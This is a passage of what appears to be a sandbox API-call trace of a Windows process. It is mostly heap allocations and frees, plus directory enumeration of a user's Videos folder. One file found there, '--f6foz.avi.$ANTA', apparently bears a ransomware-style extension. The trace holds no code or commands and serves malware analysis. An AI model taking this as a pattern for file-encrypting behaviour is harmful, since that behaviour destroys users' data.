RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0107.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0107.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0107.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.652] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0107.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a75c0 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9a) returned 0x40a7cf8 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ef0 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ef0 | out: hHeap=0x1780000) returned 1 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a75c0 | out: hHeap=0x1780000) returned 1 [0107.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0107.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0107.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0107.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x140) returned 0x43e8260 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7cf8 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.710] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0107.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0107.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0107.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.711] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.711] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0107.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0107.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.712] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0107.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0107.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.712] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0107.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.713] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0107.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.714] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.714] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0107.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ba8 [0107.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0107.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.715] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\*", lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788f5c40, ftCreationTime.dwHighDateTime=0x1d5e206, ftLastAccessTime.dwLowDateTime=0xc4bca56, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xc4bca56, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca790, cFileName=".", cAlternateFileName="")) returned 0x41ac700 [0107.716] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788f5c40, ftCreationTime.dwHighDateTime=0x1d5e206, ftLastAccessTime.dwLowDateTime=0xc4bca56, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xc4bca56, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca790, cFileName="..", cAlternateFileName="")) returned 1 [0107.716] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa67365d, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xa67365d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xa77e764, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xd600, dwReserved0=0x0, dwReserved1=0x43ca790, cFileName="--f6foz.avi.$ANTA", cAlternateFileName="--F6FO~1.$AN")) returned 1 [0107.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0107.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ba8 | out: hHeap=0x1780000) returned 1 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.716] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0107.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0107.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0107.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.717] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0107.717] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0107.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0107.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0107.718] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.718] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 